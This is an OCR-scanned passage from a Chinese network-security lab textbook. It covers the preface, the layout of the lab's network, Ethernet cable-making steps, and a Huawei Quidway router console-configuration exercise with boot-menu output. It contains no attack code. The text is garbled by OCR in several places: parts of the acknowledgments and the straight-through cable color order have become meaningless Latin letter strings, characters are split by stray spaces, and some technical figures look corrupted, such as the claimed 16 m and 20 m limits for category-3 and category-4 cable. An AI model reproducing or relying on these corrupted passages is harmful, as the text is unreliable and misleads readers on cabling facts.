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第 2 版 前 言 一 


目前 , 国内 有 近 百 所 高 校 都 设 有 密码 学 、 信 息 安全 或 信息 对 抗 专业 ， 许 
多 高 校 已 建 有 信息 安全 实验 室 ， 并 系统 地 开设 了 信息 安全 实验 课程 。 虽然 现 
有 的 信息 安全 实验 书籍 很 多 , 但 大 多 数 教材 的 内 容 缺 乏 系 统 性 ， 尤 其 从 本 科 
教学 的 角度 看 ， 它 们 都 不 太 适 合作 为 信息 安全 实验 教材 。 

本 教材 从 网 络 安全 课程 教学 体系 出 发 ,在 实验 内 容 的 编排 上 ,力求 符合 
教育 部 信息 安全 类 专业 教学 指导 委员 会 制订 的 《信息 安全 专业 指导 性 专业 规 
范 》， 满 足 该 规范 对 信息 安全 专业 本 科 生 实践 能 力 体系 的 要 求 。 本 教材 将 网 
络 安全 实验 内 容 划分 为 “基本 型 实验 、 综 合 型 实验 、 创 新 型 实验 ”三 个 层次 ， 
由 浅 入 深 ， 由 易 到 难 ， 由 简单 到 综合 ， 再 由 综合 到 创新 ， 旨 在 逐步 培养 学 生 
的 创新 意识 和 创新 能 力 。 

在 第 2 版 教材 的 写作 过 程 中 , 我 们 对 第 1 版 教材 的 实验 内 容 进行 了 修订 
和 优化 。 首 先 ， 进 一 步 加 强 了 密码 学 实验 、 网 络 攻防 实验 和 无 线 网 络 安全 的 
实验 内 容 ， 新 增 了 Web 安全 的 实验 内 容 ; 其 次 ， 对 所 有 应 用 软件 和 实验 所 
用 的 操作 系统 平台 进行 了 升级 , 并 对 实验 中 所 用 到 的 源 代码 的 出 处 进行 了 进 
一 步 核 实 ,确保 网 络 链接 的 准确 无 误 ， 最 后 ,将 第 1 版 教材 中 操作 系统 安全 
的 实验 内 容 全 部 搬移 到 作者 新 出 版 的 《信息 系统 安全 实验 教程 》 中， 并 删除 
了 计算 机 病毒 防护 实验 的 内 容 。 

本 书 是 一 本 内 容 丰 富 、 特 色 鲜明 、 实 用 性 强 的 信息 安全 实验 教材 。 该 教 
材 不 仅 包含 了 密码 学 算法 实验 、 网 络 安全 设备 配置 、 安 全 工具 应 用 、 网 络 攻 
防 等 基本 型 实验 , 而 且 还 安排 了 专用 网 络 安全 测试 仪器 操作 、 无 线 安全 接 入 
系统 设计 等 综合 型 和 创新 型 的 实验 内 容 。 此 外 , 在 每 个 实验 的 后 面 均 附 有 实 
验 报告 和 思考 题 , 便于 读者 对 实验 过 程 和 结果 进行 分 析 和 总 结 ， 并 对 所 提出 
的 问题 进行 深入 思考 。 

本 书 的 内 容 分 为 4 篇 共 18 章 。 第 1 篇 为 计算 机 网 络 基础 ， 主 要 包括 信 
息 安 全 实验 室 网 络 环境 建设 、 网 络 设 备 配 置 及 必 备 基础 知识 等 实验 内 容 ， 由 
第 1 章 和 第 2 章 构成 ; 第 2 篇 为 密码 学 ， 主 要 包括 对 称 密码 算法 、 公 钥 密 码 
算法 、 杂 凑 算 法 、 数 字 签 名 算法 以 及 常用 密码 软件 工具 使 用 等 实验 内 容 ， 由 
第 3 一 7 章 构成 ; 第 3 篇 为 网 络 安全 ， 主 要 包括 常用 网 络 安全 设备 、 网 络 安 
全 扫描 、 网 络 数据 获取 与 监视 、 典 型 的 安全 协议 、Web 安全 、 无 线 网 络 安全 、 
网 络 攻防 等 实验 内 容 ， 由 第 8 一 17 章 构成 ; 第 4 篇 包括 第 18 章 ， 专 门 介绍 
网 络 安全 测试 仪器 的 使 用 。 
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参加 本 书 编写 的 人 员 有 刘 建 伟 、 李 晖 、 张 卫 东 、 杜 瑞 颖 、 陈 晶 等 ， 全 书 由 刘 建 伟 ; 
行 了 统 稿 和 审 校 。 本 书 的 第 1 章 和 第 2 章 、 第 8—10 章 由 刘 建 伟 编写 , 第 3 一 7 SERHZERE, 
张卫东 和 刘 建 伟 编写 ， 第 11 一 13 章 和 第 15 章 由 李 上 晖 编写 ， 第 14 章 和 第 16 章 由 杜 瑞 颖 
和 陈 晶 编写 ， 第 17 章 由 刘 建 伟 和 张卫东 编号， 第 18 章 由 刘 建 伟 和 胡 波 编写 。 

在 本 书 的 编写 过 程 中 ， 北 京 航空 航天 大 学 的 张 其 善 教授 、 西 安 电子 科技 大 学 的 王 育 
民 教 授 、 武汉 大 学 的 张 焕 国教 授 均 给 予 作者 深切 的 关怀 与 鼓励 。 感谢 本 教学 团队 的 毛 剑 、 
尚 涛 、 修 春 娣 等 青年 教师 的 支持 与 配合 。 特 别 感谢 北京 航空 航天 大 学 电子 信息 工程 学 院 
王 祖 林 院 长 、 王 力 军 老师 、 李 昕 老师 ， 他 们 在 北航 信息 安全 实验 室 的 建设 中 给 予 作者 大 
力 的 支持 和 帮助 。 

特别 感谢 上 海 交 通 大 学 的 陈 克 非 教授 。 作 为 本 书 的 责任 编 委 ， 陈 克 非 教授 认真 审阅 
了 全 书 并 提出 了 许多 宝贵 的 意见 和 建议 ， 作 者 在 此 向 他 表示 衷心 的 感谢 。 

北京 航空 航天 大 学 的 陈 杰 、 邱 修 峰 、 刘 建华 、 刘 哲 、 毛 可 飞 、 王 朝 等 博士 生 和 李 为 
E RRE PE RR, A RI KE JEER RER EEI, 
GRITS. WIER KNT 5t9j. 4ehb. EZRM, WERK 
海 、 张 腾 源 、 朱 乐 翔 等 硕士 生 和 武汉 大 学 的 博士 和 硕士 研究 生 们 为 提高 本 书 的 质量 做 了 
实验 验证 、 截 图 升级 及 文字 校对 工作 ， 作 者 在 此 一 并 向 他 们 表示 真诚 的 感谢 。 

本 书 得 到 了 国家 重点 基础 研究 发 展 计 划 C973 计划 ) 课题 “可 重 构 基 础 网 络 的 安全 
和 管控 机 理 与 结构 ”( 课 题 编号 : 2012CB315905)、 军 口 863 计划 项 目 、 军 口 “十 二 五 ” 
预 研 项 目 、 武 器 装备 基金 以 及 高 等 学 校 博士 学 科 点 专项 科研 基金 (基金 编号 : 
20091102110004) 的 支持 。 

尽管 本 实验 教材 积累 了 作者 多 年 的 实践 经 验 和 教学 成 果 ， 但 由 于 其 所 涉及 的 知识 面 
宽广 ， 采 用 的 实验 设备 和 工具 种 类 繁多 ， 加 之 时 间 紧 张 、 水 平 有 限 ， 一 定 存在 许多 不 足 
之 处 ， 奶 请 广大 读者 给 予 批 评 和 指正 。 
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44 ”实验 室 网 络 环境 搭建 


1.1.1 实验 室 网 络 拓扑 结构 


舍 息 安全 实验 室 的 硬件 系统 包括 
防火 墙 ; 

网 络 入 侵 检测 系统 (NIDS ); 
虚拟 专用 网 络 (VPN); 

物理 隔离 网 卡 ; 

路 由 器 ; 

交换 机 ; 

集线器 。 

言 息 安 全 实验 室 的 软件 系统 包括 : 
脆弱 性 扫描 系统 

病毒 防护 系统 ; 

身份 认证 系统 ; 

网 络 攻 防 软件 ; 
主机 入 侵 检测 软件 ; 
因特网 非法 外 联 监控 软件 。 
信息 安全 实验 室 的 网 络 拓扑 结构 如 图 1-1 所 示 。 


1.1.2 ”实例 介绍 


在 实验 室 网 络 拓扑 结构 中 ， 一 个 局 域 网 的 主机 IP 地 址 可 按照 图 1-2 设置 ， 而 另外 两 
个 网 络 中 主机 的 IP 地 址 则 按照 192.168.2.11 一 192.168.2.20 和 192.168.3.11 一 192.168.3.20 
来 设置 。 注 意 : 一 个 局 域 网 中 的 主机 数量 可 以 根据 学 生 分 组 人 数 的 多 少 来 设计 。 在 本 网 
络 安全 方案 设计 中 ， 假 设 一 个 班 有 30 名 学 生 ， 分 为 三 组 ， 每 组 10 人 。 如 果 学 生 人 数 比 
较 多 ， 可 以 适当 增加 每 个 局 域 网 中 主机 的 数目 ， 或 者 增加 局 域 网 的 个 数 。 当 然 ， 这 需要 
增加 设备 和 投资 。 
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图 1-1 实验 室 网 络 拓扑 结构 
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192.168.1.11~192.168.1.20 


网 络 I 


图 1-2 子 网 络 卫 地 址 设置 


12 网络 综 合 布线 


1.2.1 网 线 制作 


目前 局 域 网 构建 已 经 极为 普遍 ， 小 型 局 域 网 无 处 不 在 ， 例 如 家 庭 局 域 网 、 网 吧 、 校 
园 局 域 网 和 小 型 办 公 网 等 。 在 搭建 网 络 的 时 候 ， 网 线 的 制作 是 需要 掌握 的 最 基本 技能 。 
网 线 制作 的 整个 过 程 都 要 准确 到 位 ， 排 序 的 错误 和 压制 的 不 到 位 都 将 直接 影响 网 线 的 使 
用 ， 导 致 网 络 不 通 或 者 网 速 缓慢 。 

超 五 类 线 是 网 络 布线 最 常用 的 网 线 ， 分 为 屏蔽 和 非 屏蔽 两 种 。 如 果 是 室外 使 用 ， 屏 
蔽 线 要 好 些 ; 如 果 是 在 室内 使 用 ， 一 般 用 非 屏蔽 五 类 线 就 够 了 。 由 于 此 类 线 不 带 屏蔽 层 ， 
线 缆 会 相对 柔软 些 ， 但 其 连接 方法 都 是 一 样 的。 一 般 的 超 五 类 线 里 都 有 4 对 绞 在 一 起 的 
细 线 ， 并 用 不 同 的 颜色 标明 。 

双 绞 线 一 般 用 于 星 状 网 络 的 布线 ， 每 条 双 绞 线 通 过 两 端 安装 的 RJ-45 连接 器 (俗称 
水 晶 头 ) 将 各 种 网 络 设备 连接 起 来 。 双 绞 线 的 标准 接 法 不 是 随便 规定 的 ， 目 的 是 保证 线 
缆 接 头 布局 的 对 称 性 ， 这 样 就 可 以 使 接头 内 线 绕 之 间 的 干扰 相互 抵消 。 双 绞 线 有 两 种 标 
ME: EIA/TIA 568A (T568A) 标准 和 EIA/TIA 568B (TS68B) 标准 。 两 种 标准 的 线 序 如 
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表 1-1 所 示 。 


表 1-1 T568A 标准 和 T568B 标准 线 序 表 


制作 网 线 时 ， 如 果 不 按 标准 连接 ， 虽 然 有 时 线路 也 能 接 通 ， 但 是 线路 内 部 各 线 对 之 
间 的 干扰 不 能 有 效 消除 ， 从 而 导致 信号 传送 出 错 率 升 高 ， 最 终 影响 网 络 整体 性 能 。 只 有 
按 规 范 标准 建设 ， 才 能 保证 网 络 的 正常 运行 ， 也 会 给 后 期 的 维护 工作 带 来 便利 。 

直通 线 〈 也 叫 作 正 线 ) 两 头 都 按 T568B 线 序 标准 连接 ， 直 通 线 的 两 端 线 序 一 样 ， 即 
Mie BRR ATE. RE. Aa. i. AR a. DER. ín. MAE 〈 也 叫 作 反 线 ) 一 
头 按 T568A 线 序 连接 ， 一 头 按 T568B 线 序 连接 。 交 叉 线 的 制作 方法 与 直通 线 相同 。 

下 面 介 绍 制作 直通 网 线 的 步骤 。 

C1) 剪断 : 利用 压 线 钳 的 剪 线 刀 口 剪 取 适 当 长 度 的 网 线 。 截 取 双 绞 线 长 度 至 少 为 
0.6m， 最 多 不 超过 100m. 

(2) 剥皮 : 用 压 线 钳 的 剪 线 刀 口 将 线头 剪 齐 ， 再 将 线头 放 入 剥 线 刀 口 ， 让 线头 触及 
挡 板 ， 调 整 好 长 度 ， 稍 微 握 紧 压 线 钳 慢 慢 旋转 ， 让 刀口 划 开 双 绞 线 的 保护 胶皮 ， 拔 下 


胶皮 。 
G) HERE: 剥 除外 包皮 后 即 可 见 到 双 绞 线 网 线 的 4 对 8 条 芯 线 ， 按 照 规 定 的 线 序 排 
列 整齐 。 


(4) BY: 把 线 尽量 捉 直 (不 要 缠绕 )、 压 平 (不 要 重合 )、 挤 紧 理 顺 ( 朝 一 个 方向 
紧 靠 )， 然 后 用 压 线 钳 把 线头 剪 平 齐 。 外 层 去 掉 外 层 绝缘 皮 的 部 分 约 为 1 4mm， 这 个 长 度 
正好 能 将 各 细 导 线 插入 到 各 自 的 线 模 。 如 果 该 段 留 得 过 长 ， 一 则 会 由 于 线 对 不 再 互 绞 而 
增加 串扰 ， 二 则 会 由 于 水 晶 头 不 能 压 住 护 套 而 可 能 导致 电缆 从 水 晶 头 中 脱出 ， 造 成 线路 
的 接触 不 良 甚至 中 断 。 

(5) 插入 : 一 只 手 用 拇指 和 中 指 捏 住 水 晶 头 ， 使 有 塑料 弹片 的 一 侧 向 下 ， 针 脚 一 方 
朝向 远离 自己 的 方向 ， 并 用 食指 抵 住 ， 另 一 只 手 捏 住 双 绞 线 外 面 的 胶皮 ， 缓 组 用 力 将 8 
条 导线 同时 沿 RJ-45 头 内 的 8 个 线 槽 插入 ， 一 直 插 到 线 槽 的 顶端 。 

(6) 压制 : 确认 所 有 导线 都 到 位 ， 并 透视 水 晶 头 检查 一 遍 线 序 无 误 后 ， 就 可 以 用 压 
线 钳 压制 RJ-45 头 了 。 将 RJ-45 头 从 无 牙 的 一 侧 推 入 压 线 钳 夹 槽 后 ， 用 力 握 紧 线 钳 (如 
果 力 气 不 够 大 可 以 使 用 双手 一 起 压 )， 将 突出 在 外 面 的 针脚 全 部 压 入 水 晶 头 内 。 

CD) 测试 : 把 水 晶 头 的 两 端 都 做 好 后 即 可 用 网 线 测试 仪 进行 测试 ， 如 果 测 试 仪 上 8 
个 指示 灯 都 依次 为 绿色 办 过 ， 证 明 网 线 制作 成 功 。 如 果 是 直通 线 ， 测 试 仪 上 的 灯 应 该 是 
依次 顺序 闪 亮 ， 如 果 做 的 是 交叉 线 ， 那 么 测试 仪 的 闪 亮 顺序 应 该 是 3、6、1、4、5、2、 
JE 

另外 ， 在 购买 双 绞 线 时 请 注意 : 应 该 选用 的 是 五 类 双 绞 线 。 三 类 线 的 传输 距离 只 能 
达到 16m， 四 类 线 只 能 达到 20m， 只 有 五 类 线 以 及 超 五 类 线 等 才能 到 达 100m. 
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在 布线 时 ， 要 注意 : 对 每 条 网 线 要 采用 号 卡子 〈 一 种 塑料 卡子 ) 在 网 线 的 两 头 做 适 
当 标识 。 可 以 按照 局 域 网 和 分 组 进行 编号 。 例 如 ， 若 网 线 连接 的 是 第 一 个 局 域 网 的 第 5 
台 主机 , 那么 可 以 在 网 线 两 头 的 线 卡 子 上 编号 为 A5。 这样 , 可 以 保证 网 线 不 会 出 现 混乱 ， 
且 便 于 查找 故障 。 

在 机 柜 中 ， 各 设备 之 间 的 连 线 也 要 采用 恰当 的 标识 加 以 区 分 。 实 验 室 工作 人 员 可 以 
根据 具体 情况 自行 设计 编号 。 


122 设备 连接 


1. 网 卡 与 网 卡 

网 卡 之 间 直 接连 接 ， 可 以 不 用 集线器 (Hub)， 应 采用 交叉 线 连接 。 

2. 网 卡 与 光 收 发 模块 

将 网 卡 装 在 计算 机 上 ,做 好 设置 ; 给 收发 器 接 上 电源 ， 严 格 按照 说 明 书 的 要 求 操作 ; 
用 双 绞 线 把 计算 机 和 收发 器 连接 起 来 ， 双 绞 线 应 为 交叉 线 接 法 ; 用 光 跳 线 把 两 个 收发 器 
连接 起 来 ， 如 收发 器 为 单 模 ， 跳 线 也 应 用 单 模 的 。 光 跳 线 连接 时 ， 一 端 接 RX， 另 一 端 
接 TX， 如 此 交叉 连接 。 不 过 现在 很 多 光 模 块 都 有 调控 功能 ， 交 叉 线 和 直通 线 都 可 以 用 。 


光纤 收发 器 基本 网 络 连接 如 图 1-3 所 示 。 
Network 
TX SC/ST 
Fiber 
RX Network 


图 1-3. 光纤 收发 器 基本 网 络 连 接 图 


3. 光 收 发 模块 与 交换 机 

当 用 双 绞 线 把 交换 机 和 收发 器 连接 起 来 时 ， 采 用 直通 线 连接 。 

4. 网 卡 与 交换 机 

当 网 卡 与 交换 机 相连 时 , 采用 直通 线 连接 。 含 有 网 卡 的 设备 包括 PC, VPN, 防火 墙 ， 
入 侵 检测 系统 ， 路 由 器 等 设备 。 

5. 集线器 与 集线器 〈 交 换 机 与 交换 机 ) 

当 两 台 集线器 〈 或 交换 机 ) 通过 双 绞 线 级 联 时 ， 必 须要 用 交叉 线 。 这 种 情况 适用 于 
那些 没有 标明 专用 级 联 端口 的 集线器 之 间 的 连接 。 但 是 ， 有 许多 集线器 为 了 方便 用 户 
提供 了 一 个 专门 用 来 串 接 到 另 一 台 集 线 器 的 端口 。 在 对 此 类 集线器 进行 级 联 时 ， 应 采用 
直通 线 连接 。 

6. 交换 机 与 集线器 

交换 机 与 集线器 之 问 也 可 通过 级 联 的 方式 进行 连接 。 级 联通 常 是 解决 不 同 品牌 的 交 
换 机 之 间 以 及 交换 机 与 集线器 之 问 连接 的 有 效 手段 。 
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7. VPN 和 防火 墙 ，VPN 和 路 由 器 ， 防 火 墙 与 路 由 器 

它们 之 间 的 连接 与 PC 之 间 连 接 类 似 ， 使 用 交叉 线 。 

8. 计算 机 串口 与 路 由 器 /交换 机 /防火 墙 /VPN 等 设备 的 RJ-45 控制 口 连接 

当 采 用 计算 机 的 串口 对 以 上 网 络 设备 进行 管理 时 ， 需 要 在 PC 的 串口 上 安装 一 个 串 
口 /RJ-45 转换 器 。 这 样 ， 就 可 以 采用 一 条 直通 线 连接 PC 和 网 络 设备 的 RJ-45 控制 口 。 注 
意 : 串口 /RJ-45 转换 器 的 引 脚 线 序 排列 有 可 能 不 同 。 各 设备 随机 附件 中 提供 的 串口 /RJ-45 
转换 器 可 能 不 同 。 因 此 ， 在 设备 安装 时 ， 切 记 不 要 把 这 些 串口 /RJ-45 转换 器 张冠李戴 。 
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21 路 由 器 


简单 地 说 ， 路 由 器 的 基本 作用 就 是 使 处 于 不 同 网 段 的 主机 之 间 可 以 相互 通信 。 

路 由 器 工作 在 OSI 参考 模型 的 第 三 层 。 其 主要 功能 是 执行 特定 的 路 由 算法 ， 为 网 络 
中 传输 的 数据 包 提供 从 源 节点 到 目的 节点 的 路 径 。 同时， 路 由 器 通过 网 络 层 的 IP. 地 址 来 
区 分 不 同 的 网 络 ， 达 到 网 络 互联 和 隔离 的 目的 。 路 由 器 只 根据 IP 地 址 来 转发 数据 ， 只 要 
网 络 层 运行 的 是 YP 协议 ， 不 同类 型 的 网 络 也 可 以 通过 路 由 器 互联 起 来 。 

IP 地 址 是 与 硬件 地 址 (MAC) 无 关 的 逻辑 地 址 。 两 者 之 间 通 过 ARP 实现 映射 。IP 
地 址 由 两 部 分 组 成 : 一 部 分 定义 了 网 络 号 ， 另 一 部 分 定义 了 网 络 内 的 主机 号 。 两 部 分 结 
合 起 来 ， 构 成 一 个 完整 的 了 P 地 址 。 

通信 中 能 在 具有 相同 网 络 号 的 IP 地 址 之 间 进行 , 要 与 其 他 网 络 的 主机 通信 ， 则 必须 
经 过 同一 网 络 上 的 某 个 路 由 器 或 网 关 。 不 同 网 络 号 的 IP 地 址 不 能 直接 通信 ， 即 使 它们 连 
接 在 一 起 ， 也 不 能 直接 通信 。 路 由 器 在 网 络 中 扮演 着 桥梁 的 角色 。 

路 由 器 实质 上 是 一 台 微 型 计算 机 ， 主 要 由 以 下 儿 个 部 分 组 成 。 

e 中 央 处 理 器 (CPU); 

e 操作 系统 ; 
e 内 部 随机 存储 器 (RAM); 
e ff (FLASH MEMORY 用 来 存储 路 由 器 操作 系统 ); 
e 非 易 失 性 随机 访问 存储 器 (NVRAM 用 来 存储 路 由 器 配置 文件 )。 

一 般 商 用 路 由 器 没有 磁盘 驱动 器 、 键 盘 、 显 示 器 。 配 置 路 由 器 的 一 种 方法 是 将 路 由 
器 连接 在 PC 上 ， 通 过 超级 终端 对 它 进行 配置 。 

2.1.1 路 由 器 配置 

【实验 目的 】 

(1) 路 由 器 在 网 络 中 存在 的 意义 及 重要 性 。 


(2) 使 用 Windows 中 的 超级 终端 (hyperterminal) 配置 路 由 器 。 
(3) 掌握 路 由 器 配置 的 基本 命令 。 


【原理 简介 】 
本 章 以 华为 路 由 器 为 例 来 演示 路 由 器 的 配置 与 工作 过 程 。 
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本 实验 所 使 用 的 是 华为 Quidway R2811 路 由 器 ， 其 正视 图 如 图 2-1 所 示 ， 其 后 视图 
如 图 2-2 所 示 。 
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图 2-1 Quidway R2811 正视 图 图 2-2 Quidway R2811 后 视图 


从 图 2-2 中 可 以 看 到 标识 着 LANO 和 LANI 的 局 域 网 接口 ， 标 识 着 WAN 的 广域网 
接口 ， 还 有 AUX 接口 和 Console〈 在 路 由 器 面板 上 简写 为 CON) 接口 。 

下 面 介绍 这 些 接口 的 作用 。 

(D LAN 接口 : 使 用 RJ-45 水 晶 头 和 双 绞 线 的 以 太 网 接口 。 

(2) WAN 接口 : 是 广域网 接口 的 一 种 ， 也 是 应 用 最 多 的 一 种 一 一 高 速 同步 串口 
(Serial)。 这 种 端口 主要 用 来 与 目前 广泛 应 用 的 DDN、 帧 中 继 、X.25 等 广域网 设备 进行 
专线 连接 。 一 般 来 说 , 通过 这 种 端口 所 连接 的 网 络 两 端 要 求实 时 同步 ， 所 以 速率 非常 高 ， 
如 图 2-3 所 示 。 

(3) AUX 端口 : AUX 端口 为 异步 接口 ， 主 要 用 于 远程 配置 ， 也 可 以 用 来 拨号 连接 ， 
还 可 以 通过 收发 器 与 Modem 进行 连接 。 路 由 器 通常 同时 提供 AUX 接口 与 Console 接口 。 

(4) Console (CON) 端口 : Console 端口 使 用 配置 专用 连 线 直 接连 接 计 算 机 的 串口 ， 
利用 终端 仿真 程序 (如 Windows 的 “超级 终端 ") 进行 路 由 器 配置 。 路 由 器 的 Console 
端口 多 为 RJ-45 接口 。 如 果 Console 端口 为 RJ-45 接口 ， 请 直接 采用 直通 线 连接 至 一 台 
PC 的 串口 。 此 时 ， 在 PC 的 串口 上 要 安装 一 个 串口 /RJ-45 转换 器 。 

当然 ， 路 由 器 上 不 仅 有 这 些 接口 ， 还 有 AU 接口 、 光 纤 接 口 、 异 步 串 行 接口 等 。 如 
果 读 者 感 兴趣 ， 可 以 自己 查找 资料 了 解 其 他 接口 的 作用 。 


串口 /RJ-45 转 换 器 


WAN 接 口 
图 2-3 广域网 接口 图 2-4 路 由 器 的 Console 端口 与 PC 串口 的 连接 示意 图 


【实验 环境 】 

本 次 实验 使 用 以 下 设备 。 

(1) 一 台 华 为 Quidway R2811 路 由 器 。 

(2) 一 台 PC 或 笔记 本 。 

(3) 一 条 连接 PC 串 行 端口 和 路 由 器 Console 的 网 线 。 
(4) 一 个 串口 /RJ-45 转换 器 。 

具体 的 连接 示意 图 如 图 2-4 所 示 。 
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【实验 步 又 】 

(1) 观察 和 记录 给 定型 号 路 由 器 的 端口 。 

(2) 使 用 线 绕 正确 连接 路 由 器 和 PC。 

(3) 配置 超级 终端 。 

@ 启动 计算 机 ， 连 击 【 开 始 】| 【程序 】|【 附 
件 】| 【通信 】| 【超级 终端 】。 

Q 为 本 次 连接 起 一 个 名 字 ， 比 如 “Router”， 
如 图 2-5 所 示 。 


© 单 击 【 确 定 】 按钮, 选择 串口 COMI 端口 ， 图 2-5 新 建 连接 Router 
如 图 2-6 所 示 。 
© 单 击 【确定 】 按 钮 ， 出 现 【COMI 属性 】 对 话 框 ， 设 置 数据 如 图 2-7 所 示 。 
| outer 属性 2x com Ett a2 xj 


图 2-6 ”选择 端口 图 2-7 端口 参数 设置 


单 击 【 确 定 】 按 钮 ， 超 级 终端 的 基本 配置 便 完成 了 。 

(4) 路 由 器 配置 。 

一 般 情况 下 ， 配 置 路 由 器 的 基本 思路 为 ， 在 配置 路 由 器 之 前 ， 需 要 将 组 网 需求 具体 
化 、 详 细 化 ， 包 括 组 网 目的 、 路 由 器 在 网 络 互 联 中 的 角色 、 子 网 的 划分 、 广 域 网 类 型 和 
传输 介质 的 选择 、 网 络 的 安全 策略 和 网 络 可 靠 性 需求 等 ， 然 后 根据 以 上 要 素 绘 出 一 个 清 
晰 完整 的 组 网 图 。 

Quidway AR28 系列 路 由 器 向 用 户 提供 命令 行 接口 ,通过 这 些 命令 来 配置 和 管理 路 由 
器 ， 命 令 行 接口 有 如 下 特点 。 

e 通过 CON 端口 进行 本 地 配置 。 
通过 Telnet 进行 本 地 或 远程 配置 ， 用 Telnet 命令 直接 登录 并 管理 其 他 路 由 器 。 

用 户 可 以 随时 输入 “? ”而 获得 在 线 帮助 。 
提供 全 中 文 的 提示 和 帮助 信息 。 
提供 网 络 测试 工具 ， 如 tracert, ping 等 ， 迅 速 诊 断 网 络 的 可 达 性 。 


mum 11 mm 
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e 提供 种 类 丰富 、 内 容 详尽 的 调试 信息 ， 帮 助 诊断 网 络 故障 。 

e 命令 行 解释 器 对 关键 字 采 取 不 完全 匹配 的 搜索 方法 ， 如 命令 display， 输 入 dis 
即 可 。 

路 由 器 配置 步骤 如 下 。 

D 确认 线 费 连 接 正确 和 超级 终端 配置 无 误 。 

Q) 给 路 由 器 加 电 。 超 级 终端 的 输出 如 图 2-8 所 示 。 


O emo SEO MO ED Bw 


EZI 
os a 


~ Copyright(c) 1998-2006 Huawei Technologies Co., Ltd. All rights reserved. 


* Without the owner's prior written consent, 
mo decompiling or reverse-engineering shall be allowed. 


User interface cong is available. 


Please press ENTER. 


«Qui dway: 
Eon 16" 15:11:21:721 2007 Quidway SHELL/S/LOSIN: Console login from cond 


<Quidway> 


图 2-8 启动 界面 


© 稍 等 一 会 儿 , 便 可 以 对 路 由 器 进行 配置 了 .。 当 屏幕 中 出 现 Press Ctrl-B to enter Boot 
Menu H. Press ENTER key to get start when you see ATSO=1 还 没有 出 现 前 ， 按 Ctrl+B fib, 
则 可 以 进入 引导 模式 ， 如 图 2-9 所 示 。 


iol x!) 
RED MED SEY HO EC) HW 


li] 215] soles) ej 


Copyright (c) 1998-2005 Huawei Technologies Co., Ltd 


Testing memory.. .OK! 

128M bytes SDRAM 
32768k bytes flash memory 
Hardware Version is MTR 1.0 
CPLD Version is CPLD 1.0 


Press Ctrl-8 to enter Boot Menu 
Please input Bootrom password: 


Boot Menu: 

i Download application program with XMODEM 
Download application program with NET 

3 Set application file type 

4: Display applications in Flash 

5: Clear application super password 

6: Reset console authentication 

7: Start up and ignore configuration 

8: Enter debugging environment 

9: Boot Rom Operation Nenu 

a: Do not check the version of the software 

b: Exit and reboot 

n 


Enter your choice(1-b): 
SE 
Ei 


EI MCI a a ga OT 
图 2-9 进入 引导 模式 
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© 若 没有 设置 密码 ， 便 可 直接 回 车 。 然 后 可 以 看 到 引导 菜单 。 
在 图 2-9 中 有 如 下 选项 。 
1: Download application program with XMODEM (使 用 XMODEM 下 载 应 用 程序 ) 
: Download application program with NET 〈 使 用 NET 下 载 应 用 程序 ) 
: Set application file type〈 设 置 应 用 文件 类 型 ) 
: Display applications in Flash 〈 显 示 闪 存 中 的 应 用 程序 ) 
: Clear application super password〈 清 除 应 用 的 超级 口令 ) 
: Reset console authentication 〈 复 位 控制 口 认证 ) 
Start up and ignore configuration (启动 设 备 且 不 按照 当前 配置 运行 ) 
: Enter debugging environment (进入 调试 环境 ) 
: Boot Rom Operation Menu (从 Rom 操作 菜单 引导 ) 
: Do not check the version of the software (不 检查 软件 的 版 本 ) 

b: Exit and reboot (退出 并 重启 ) 

如 果 以 前 有 人 配置 过 这 人 台 路 由 器 ， 那 么 可 以 选 7， 来 清除 配置 文件 ;然后 选 b， 重 新 
启动 路 由 器 让 它 直接 进入 配置 模式 。 

© 当 出 现 Proceed with router configuration? [yes]: 时 ， 输 入 “no” 跳 过 初始 配置 。 
之 后 可 以 看 到 命令 提示 符 ，[Router]， 这 样 就 进入 了 路 由 器 的 配置 模式 。 

(5) 基本 命令 。 

Quidway AR28 系列 路 由 器 的 命令 行 接口 提供 了 丰富 的 配置 命令 。 在 系统 视图 之 下 ， 
为 了 方便 用 户 管理 路 由 器 ， 又 将 全 部 命令 分 组 ， 每 组 对 应 一 个 视图 ， 可 以 用 命令 在 不 同 
的 视图 之 间 切 换 。 一 般 情况 下 ， 在 某 个 视图 下 只 能 执行 限定 的 命令 ， 但 对 一 些 常用 命令 
(如 ping. display current configuration, interface 等 ) 在 各 种 视图 下 均 可 执行 。 在 任何 视 
图 下 ， 如 果 需 要 得 到 帮助 ， 或 者 查看 系统 支持 的 命令 ， 只 需 输 入 “? ”后 回 车 即 可 ， 路 
由 器 就 会 显示 目前 视图 下 所 支持 的 命令 ， 如 图 2-10 所 示 。 


ET ol 
APO er BEM AG WE Bh 


Dia} e] cis) 可 


f$ OP DN dU I 


Specify the system clock 
Copy Copy from one file to another. 


debugging Enable system debugging functions 
delete Delete a file 
dialer Dialer disconnect 
ir List files on a file system 
display Display current system information 
fixdisk Recover lost chains in storage devic 
format Format the device 
free Clear user terminal interface 
ftp Üpen FIP connection 
hwtacacs Specify HWTACACS server 
language-mode Specify the language environment 
lock Lock current user terminal interface 
log Settings of startup configuration loc 
looptest Send packets for loopback tes 

i reate a new directory 
more Display the contents of a file 


ove Move a file 

msdp-tracert MSDP traceroute to source RP 
mtracert race route to multicast source 
nslookup Query Internet name servers 


pad Establish one PRD connection 
—— Mere —— 

J T Hs 
ssl soe SL Tm E E 


FA 2-10 系统 命令 
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(6) 观察 上 述 命令 的 结果 ， 并 填写 实验 报告 。 
®© 使 用 display version 命令 ， 观 察 输出 ， 填 写 表 2-1. 
表 2-1 路 由 器 版 本 信息 


路 由 器 操作 系统 平台 版 本 
处 理 器 型 号 

路 由 器 序列 号 

SDRAM 大 小 

FLASH 大 小 

NVRAM 大 小 

硬件 版 本 号 

AUX 硬件 版 本 号 


Q) 使 用 display current-configuration 命令 ， 观 察 输出 ， 填 写 表 2-2. 
表 2-2 路 由 器 基本 配置 
目前 配置 版 本 号 
防火 墙 是 否 启 动 
列 出 所 有 端口 


®© 使 用 display interface ethernetO 和 display interface serial0 命令 ， 观 察 输 出 ， 填 写 
表 2-3。 
表 2-3 网 络 接口 信息 

以 太 网 0 接口 (EO) 是 否 开启 
以 太 网 0 接口 线路 协议 是 否 开启 
以 太 网 0 接口 的 硬件 地 址 
以 太 网 0 接口 是 否 全 双 工 
以 太 网 0 接口 传输 速度 
以 太 网 0 接口 最 大 传输 单元 


@ 使 用 language 命令 改变 提示 语言 并 再 次 使 用 上 述 命令 display version. ene 
current-configuration、display interface ethernet0 和 display interface serial0 命令 ， 观 察 输 
出 有 什么 不 同 。 并 检查 pe aia 确 。 

© 使 用 “? ”帮助 命令 ， 观 察 输出 。 

e 找到 【路 由 信息 协议 】 Hes 4. 

